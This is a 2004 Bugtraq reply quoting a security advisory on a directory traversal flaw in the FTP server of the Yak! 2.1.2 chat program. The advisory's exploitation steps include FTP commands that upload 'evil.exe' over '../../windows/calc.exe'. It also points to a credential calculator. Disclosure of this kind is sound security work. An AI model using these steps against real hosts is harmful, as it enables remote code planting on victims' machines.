In-Reply-To: <20041015193318.3257e4eb.aluigi@xxxxxxxxxxxxx> =========================================================================== in a previous post i reported this issue. http://www.securityfocus.com/bid/8581/ http://cert.uni-stuttgart.de/archive/bugtraq/2003/11/msg00222.html i'm NOT sure if the PUT commands works perfectly. coz with the versions i played with, i couldnt upload files succesfully and a password calculator is'nt required to know the passwords. just a little sniffer would reveal the username and password clearly. =========================================================================== >Received: (qmail 30088 invoked from network); 15 Oct 2004 19:53:23 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) > by mail.securityfocus.com with SMTP; 15 Oct 2004 19:53:23 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing3.securityfocus.com (Postfix) with QMQP > id 9C45C236F8D; Fri, 15 Oct 2004 11:23:39 -0600 (MDT) >Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> >List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> >List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> >Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx >Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 4069 invoked from network); 15 Oct 2004 11:14:25 -0000 >Date: Fri, 15 Oct 2004 19:33:18 +0000 >From: Luigi Auriemma <aluigi@xxxxxxxxxxxxx> >To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, > news@xxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx, > vuln@xxxxxxxxxxx >Subject: Directory traversal in Yak! 2.1.2 >Message-Id: <20041015193318.3257e4eb.aluigi@xxxxxxxxxxxxx> >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at autistici.org > > >####################################################################### > > Luigi Auriemma > >Application: Yak! > http://www.digicraft.com.au/yak/ >Versions: <= 2.1.2 >Platforms: Windows >Bug: directory traversal (upload) >Exploitation: remote >Date: 15 October 2004 >Author: Luigi Auriemma > e-mail: aluigi@xxxxxxxxxxxxxx > web: http://aluigi.altervista.org > > >####################################################################### > > >1) Introduction >2) Bug >3) The Code >4) Fix > > >####################################################################### > >=============== >1) Introduction >=============== > > >Yak! is a serverless chat system for Windows that lets people to chat >and to exchange files. > > >####################################################################### > >====== >2) Bug >====== > > >When the program starts it creates an username and password for each >IP address of the computer's network interfaces. >These login informations are needed to grant the access to the built-in >FTP server (used only to receive files) to other Yak! hosts. > >The problem is just in this FTP server because the input of the clients >is not filtered so is possible to upload files everywhere in the disk >on which is located the upload directory of Yak! (by default the system's >temporary folder) overwriting those existent. > >Naturally is also possible to see any remote directory and file (but >seems only c: can be surfed also if the upload folder is set on another >disk) while download is avoided by the program because it has been >designed to receive files only. > > >####################################################################### > >=========== >3) The Code >=========== > > >Do the following operations: > >Download my "Yak! username and password calculator" >http://aluigi.altervista.org/papers/yakcalc.zip to retrieve the >username and password to access to the FTP server of a specific Yak! >host. > >Then connect to the Yak! FTP port, usually 3535: > > C:\>ftp > ftp> open HOST 3535 > >Enter the calculated username and password and upload your files like >in the following example: > > dir / > dir ../../windows/ > > put > evil.exe > ../../windows/calc.exe > >(slash and backslash have the same effect) > > >####################################################################### > >====== >4) Fix >====== > > >No fix. >Vendor has been contacted exactly one month ago but no patch is >available. > > >####################################################################### > > >--- >Luigi Auriemma >http://aluigi.altervista.org > >
